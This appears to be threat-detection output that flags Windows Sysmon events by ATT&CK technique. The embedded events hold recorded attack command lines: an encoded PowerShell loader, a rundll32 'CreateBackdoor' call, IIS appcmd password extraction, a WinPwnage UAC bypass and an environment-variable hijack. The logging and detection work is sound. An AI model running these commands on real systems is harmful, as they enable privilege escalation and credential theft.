747F3D96-6EA5-5D45-0000-001032CCE100 + 6068 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" + C:\Windows\system32\ + NT AUTHORITY\SYSTEM + 747F3D96-D4E9-5D45-0000-0020E7030000 + 0x3e7 + 1 + System + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-6EA5-5D45-0000-00107AC9E100 + 932 + C:\Windows\SysWOW64\WerFault.exe + C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 6312 -ip 6312 + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1082] System Information Discovery,1558969963.990983,2019-05-27T19:12:43.990983+04:00,,Threat,Critical,System Information Discovery Process ( C:\Windows\System32\whoami.exe) ith commandline ( whoami /groups ) ,1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 6170 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-27 15:12:38.270 + 365ABB72-FE66-5CEB-0000-0010C7F80B00 + 1168 + C:\Windows\System32\whoami.exe + 6.1.7600.16385 (win7_rtm.090713-1255) + whoami - displays logged on user information + Microsoft® Windows® Operating System + Microsoft Corporation + whoami /groups + C:\Windows\system32\ + NT AUTHORITY\SYSTEM + 365ABB72-7B40-5CEC-0000-0020E7030000 + 0x3e7 + 0 + System + SHA1=DC058F52AD8ACBD316827B6DCAC2434AB3CC515C,MD5=0EBF71E33EF09CA65D9683AFA999C473,SHA256=599EFD455AEEEFE2044A9B597061F271595033F5D0DF2C99DFDBCA8394BBCEC3,IMPHASH=C5352B949915AB8CD5E1844790D19274 + 365ABB72-FE66-5CEB-0000-001058F50B00 + 3256 + C:\Windows\System32\cmd.exe + cmd.exe /c whoami /groups + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1628379198.562808,2021-08-08T03:33:18.562808+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd /c start /min C:\Users\Public\KDECO.bat reg delete hkcu\Environment /v windir /f && REM \system32\AppHostRegistrationVerifier.exe ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 557006 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2021-08-07 23:33:15.285 + 747F3D96-183B-610F-0000-0010DC6CD400 + 11324 + C:\Windows\System32\cmd.exe + 10.0.17763.592 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + Cmd.Exe + cmd /c start /min C:\Users\Public\KDECO.bat reg delete hkcu\Environment /v windir /f && REM \system32\AppHostRegistrationVerifier.exe + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-1231-610F-0000-002057A80700 + 0x7a857 + 1 + Medium + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 00000000-0000-0000-0000-000000000000 + 1108 + ? + ? + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1117] Bypassing Application Whitelisting,1584766818.01845,2020-03-21T09:00:18.018450+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\rundll32.exe) with commandline ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor)",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 243523 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-03-21 05:00:17.544 + 747F3D96-9F61-5E75-0000-001056711E00 + 7380 + C:\Windows\System32\rundll32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + RUNDLL32.EXE + rundll32 windowscoredeviceinfo.dll,CreateBackdoor + C:\Windows\system32\ + NT AUTHORITY\SYSTEM + 747F3D96-9DBA-5E75-0000-0020E7030000 + 0x3e7 + 0 + System + SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A + 747F3D96-9DBC-5E75-0000-00102C390100 + 1652 + C:\Windows\System32\svchost.exe + C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1584766818.01845,2020-03-21T09:00:18.018450+04:00,,Threat,High,"Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 243523 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-03-21 05:00:17.544 + 747F3D96-9F61-5E75-0000-001056711E00 + 7380 + C:\Windows\System32\rundll32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + RUNDLL32.EXE + rundll32 windowscoredeviceinfo.dll,CreateBackdoor + C:\Windows\system32\ + NT AUTHORITY\SYSTEM + 747F3D96-9DBA-5E75-0000-0020E7030000 + 0x3e7 + 0 + System + SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A + 747F3D96-9DBC-5E75-0000-00102C390100 + 1652 + C:\Windows\System32\svchost.exe + C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[ T1086 ] Powershell with Suspicious Argument,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,Critical,"Found User (IEWIN7\IEUser) run Suspicious PowerShell commands that include (powershell,\Windows\System32) in event with Command Line ("C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe") and Parent Image :C:\Windows\System32\sysprep\sysprep.exe , Parent CommandLine ("C:\Windows\System32\sysprep\sysprep.exe") in directory : ( C:\Windows\system32\WindowsPowerShell\v1.0\ )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 17729 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-14 02:32:51.728 + 365ABB72-28D3-5CDA-0000-001088C71300 + 3976 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + 6.1.7600.16385 (win7_rtm.090713-1255) + Windows PowerShell + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" + C:\Windows\system32\WindowsPowerShell\v1.0\ + IEWIN7\IEUser + 365ABB72-26E1-5CDA-0000-002045350100 + 0x13545 + 1 + High + SHA1=04C5D2B4DA9A0F3FA8A45702D4256CEE42D8C48D,MD5=92F44E405DB16AC55D97E3BFE3B132FA,SHA256=6C05E11399B7E3C8ED31BAE72014CF249C144A8F4A2C54A758EB2E6FAD47AEC7,IMPHASH=96BA691B035D05F44E35AB23F6BA946C + 365ABB72-28D3-5CDA-0000-00106DC31300 + 3068 + C:\Windows\System32\sysprep\sysprep.exe + "C:\Windows\System32\sysprep\sysprep.exe" + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1085] Rundll32 Execution detected,1584766818.01845,2020-03-21T09:00:18.018450+04:00,,Threat,High,"Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 243523 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-03-21 05:00:17.544 + 747F3D96-9F61-5E75-0000-001056711E00 + 7380 + C:\Windows\System32\rundll32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + RUNDLL32.EXE + rundll32 windowscoredeviceinfo.dll,CreateBackdoor + C:\Windows\system32\ + NT AUTHORITY\SYSTEM + 747F3D96-9DBA-5E75-0000-0020E7030000 + 0x3e7 + 0 + System + SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A + 747F3D96-9DBC-5E75-0000-00102C390100 + 1652 + C:\Windows\System32\svchost.exe + C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1086] PowerShell Process found,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,High,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ) through command line ( "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 17729 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-14 02:32:51.728 + 365ABB72-28D3-5CDA-0000-001088C71300 + 3976 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + 6.1.7600.16385 (win7_rtm.090713-1255) + Windows PowerShell + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" + C:\Windows\system32\WindowsPowerShell\v1.0\ + IEWIN7\IEUser + 365ABB72-26E1-5CDA-0000-002045350100 + 0x13545 + 1 + High + SHA1=04C5D2B4DA9A0F3FA8A45702D4256CEE42D8C48D,MD5=92F44E405DB16AC55D97E3BFE3B132FA,SHA256=6C05E11399B7E3C8ED31BAE72014CF249C144A8F4A2C54A758EB2E6FAD47AEC7,IMPHASH=96BA691B035D05F44E35AB23F6BA946C + 365ABB72-28D3-5CDA-0000-00106DC31300 + 3068 + C:\Windows\System32\sysprep\sysprep.exe + "C:\Windows\System32\sysprep\sysprep.exe" + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1117] Bypassing Application Whitelisting,1603490297.209324,2020-10-24T01:58:17.209324+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\rundll32.exe) with commandline ( Rundll32.exe shell32.dll,Control_RunDLL C:\PROGRA~3\DATAUS~1.DLL 4624665222)",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 424081 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-10-23 21:58:17.171 + 747F3D96-51F9-5F93-0000-001003125E00 + 7552 + C:\Windows\System32\rundll32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + RUNDLL32.EXE + Rundll32.exe shell32.dll,Control_RunDLL C:\PROGRA~3\DATAUS~1.DLL 4624665222 + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-4690-5F93-0000-002019A60800 + 0x8a619 + 1 + Medium + SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A + 00000000-0000-0000-0000-000000000000 + 1216 + ? + ? + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1603490297.209324,2020-10-24T01:58:17.209324+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( Rundll32.exe shell32.dll,Control_RunDLL C:\PROGRA~3\DATAUS~1.DLL 4624665222 )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 424081 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-10-23 21:58:17.171 + 747F3D96-51F9-5F93-0000-001003125E00 + 7552 + C:\Windows\System32\rundll32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + RUNDLL32.EXE + Rundll32.exe shell32.dll,Control_RunDLL C:\PROGRA~3\DATAUS~1.DLL 4624665222 + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-4690-5F93-0000-002019A60800 + 0x8a619 + 1 + Medium + SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A + 00000000-0000-0000-0000-000000000000 + 1216 + ? + ? + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1085] Rundll32 Execution detected,1603490297.209324,2020-10-24T01:58:17.209324+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( Rundll32.exe shell32.dll,Control_RunDLL C:\PROGRA~3\DATAUS~1.DLL 4624665222 )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 424081 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-10-23 21:58:17.171 + 747F3D96-51F9-5F93-0000-001003125E00 + 7552 + C:\Windows\System32\rundll32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + RUNDLL32.EXE + Rundll32.exe shell32.dll,Control_RunDLL C:\PROGRA~3\DATAUS~1.DLL 4624665222 + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-4690-5F93-0000-002019A60800 + 0x8a619 + 1 + Medium + SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A + 00000000-0000-0000-0000-000000000000 + 1216 + ? + ? + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1558920559.894473,2019-05-27T05:29:19.894473+04:00,,Threat,Low,Found User (IIS APPPOOL\DefaultAppPool) running image ( C:\Windows\System32\inetsrv\appcmd.exe ) through command line ( "C:\Windows\System32\inetsrv\appcmd.exe" list vdir /text:userName ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 5970 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-27 01:29:19.834 + 365ABB72-3D6F-5CEB-0000-0010B2D3FF00 + 3848 + C:\Windows\System32\inetsrv\appcmd.exe + 7.5.7600.16385 (win7_rtm.090713-1255) + Application Server Command Line Admin Tool + Internet Information Services + Microsoft Corporation + "C:\Windows\System32\inetsrv\appcmd.exe" list vdir /text:userName + C:\Windows\Temp\ + IIS APPPOOL\DefaultAppPool + 365ABB72-B26B-5CEA-0000-002023240800 + 0x82423 + 0 + High + SHA1=C5423FEF0E8E211BB8BAB9C11E730048BBED7B29,MD5=0E5BC786206A3762CE47A0A2DBD01D7B,SHA256=113F68086A3F02276395CB70C72B00ED33A47FD00820D229093CD6ADDC2F73F4,IMPHASH=1697BBEAB0AC62DD7B8016CE25425F45 + 365ABB72-3D4A-5CEB-0000-0010FA93FD00 + 2584 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA== + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1053] Scheduled Task - Process,1557621150.227012,2019-05-12T04:32:30.227012+04:00,,Threat,Low,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\schtasks.exe ) through command line ( "C:\Windows\System32\schtasks.exe" /create /xml c:\users\ieuser\appdata\local\temp\elevator.xml /tn elevator ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 16243 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-12 00:32:30.023 + 365ABB72-699E-5CD7-0000-001073582200 + 3876 + C:\Windows\System32\schtasks.exe + 6.1.7600.16385 (win7_rtm.090713-1255) + Manages scheduled tasks + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\System32\schtasks.exe" /create /xml c:\users\ieuser\appdata\local\temp\elevator.xml /tn elevator + c:\Users\IEUser\Downloads\WinPwnage-master\WinPwnage-master\ + IEWIN7\IEUser + 365ABB72-5DEC-5CD7-0000-00204A380100 + 0x1384a + 1 + High + SHA1=8A7E8B05A122B768AB85466B2A3DAF7A358F90F4,MD5=2003E9B15E1C502B146DAD2E383AC1E3,SHA256=15018D0093BEFABBA8B927743191030D1F8C17BB97FDB48C2FC3EAB20E2D4B3D,IMPHASH=D92C80D49382091310FB8DB089F856A9 + 365ABB72-6998-5CD7-0000-00104E422200 + 2740 + C:\Python27\python.exe + python winpwnage.py -u elevate -i 4 -p c:\Windows\System32\cmd.exe + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1558969958.290374,2019-05-27T19:12:38.290374+04:00,,Threat,Low,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe /c whoami /groups ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 6168 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-27 15:12:38.231 + 365ABB72-FE66-5CEB-0000-001058F50B00 + 3256 + C:\Windows\System32\cmd.exe + 6.1.7601.17514 (win7sp1_rtm.101119-1850) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + cmd.exe /c whoami /groups + C:\Windows\system32\ + NT AUTHORITY\SYSTEM + 365ABB72-7B40-5CEC-0000-0020E7030000 + 0x3e7 + 0 + System + SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163 + 365ABB72-FD85-5CEB-0000-00104C0E0B00 + 1944 + C:\Windows\System32\notepad.exe + "C:\Windows\System32\notepad.exe" + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1117] Bypassing Application Whitelisting,1628379191.072445,2021-08-08T03:33:11.072445+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\SysWOW64\rundll32.exe) with commandline ( "C:\Windows\System32\rundll32.exe" c:\users\public\memViewData.jpg,PluginInit)",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 556863 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2021-08-07 23:33:08.339 + 747F3D96-1834-610F-0000-00105FE5D300 + 6576 + C:\Windows\SysWOW64\rundll32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + RUNDLL32.EXE + "C:\Windows\System32\rundll32.exe" c:\users\public\memViewData.jpg,PluginInit + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-1231-610F-0000-002057A80700 + 0x7a857 + 1 + Medium + SHA1=6778DAD71C8B06264CF2929A5242D2612D3EB026,MD5=2F633406BC9875AA48D6CC5884B70862,SHA256=26E68D4381774A6FD0BF5CA2EACEF55F2AB28536E3176A1C6362DFFC68B22B8A,IMPHASH=BB17B2FBBFF4BBF5EBDCA7D0BB9E4A5B + 747F3D96-182D-610F-0000-00106F40D300 + 9932 + C:\Windows\SysWOW64\mshta.exe + "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Public\memViewData.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5} + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1628379191.072445,2021-08-08T03:33:11.072445+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\SysWOW64\rundll32.exe ) through command line ( "C:\Windows\System32\rundll32.exe" c:\users\public\memViewData.jpg,PluginInit )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 556863 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2021-08-07 23:33:08.339 + 747F3D96-1834-610F-0000-00105FE5D300 + 6576 + C:\Windows\SysWOW64\rundll32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + RUNDLL32.EXE + "C:\Windows\System32\rundll32.exe" c:\users\public\memViewData.jpg,PluginInit + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-1231-610F-0000-002057A80700 + 0x7a857 + 1 + Medium + SHA1=6778DAD71C8B06264CF2929A5242D2612D3EB026,MD5=2F633406BC9875AA48D6CC5884B70862,SHA256=26E68D4381774A6FD0BF5CA2EACEF55F2AB28536E3176A1C6362DFFC68B22B8A,IMPHASH=BB17B2FBBFF4BBF5EBDCA7D0BB9E4A5B + 747F3D96-182D-610F-0000-00106F40D300 + 9932 + C:\Windows\SysWOW64\mshta.exe + "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Public\memViewData.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5} + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1085] Rundll32 Execution detected,1628379191.072445,2021-08-08T03:33:11.072445+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\SysWOW64\rundll32.exe ) through command line ( "C:\Windows\System32\rundll32.exe" c:\users\public\memViewData.jpg,PluginInit )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 556863 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2021-08-07 23:33:08.339 + 747F3D96-1834-610F-0000-00105FE5D300 + 6576 + C:\Windows\SysWOW64\rundll32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + RUNDLL32.EXE + "C:\Windows\System32\rundll32.exe" c:\users\public\memViewData.jpg,PluginInit + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-1231-610F-0000-002057A80700 + 0x7a857 + 1 + Medium + SHA1=6778DAD71C8B06264CF2929A5242D2612D3EB026,MD5=2F633406BC9875AA48D6CC5884B70862,SHA256=26E68D4381774A6FD0BF5CA2EACEF55F2AB28536E3176A1C6362DFFC68B22B8A,IMPHASH=BB17B2FBBFF4BBF5EBDCA7D0BB9E4A5B + 747F3D96-182D-610F-0000-00106F40D300 + 9932 + C:\Windows\SysWOW64\mshta.exe + "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Public\memViewData.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5} + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1558920559.784314,2019-05-27T05:29:19.784314+04:00,,Threat,Low,Found User (IIS APPPOOL\DefaultAppPool) running image ( C:\Windows\System32\inetsrv\appcmd.exe ) through command line ( "C:\Windows\System32\inetsrv\appcmd.exe" list vdir "Line Number: 0" /text:password ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 5967 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-27 01:29:19.714 + 365ABB72-3D6F-5CEB-0000-0010F2CFFF00 + 3844 + C:\Windows\System32\inetsrv\appcmd.exe + 7.5.7600.16385 (win7_rtm.090713-1255) + Application Server Command Line Admin Tool + Internet Information Services + Microsoft Corporation + 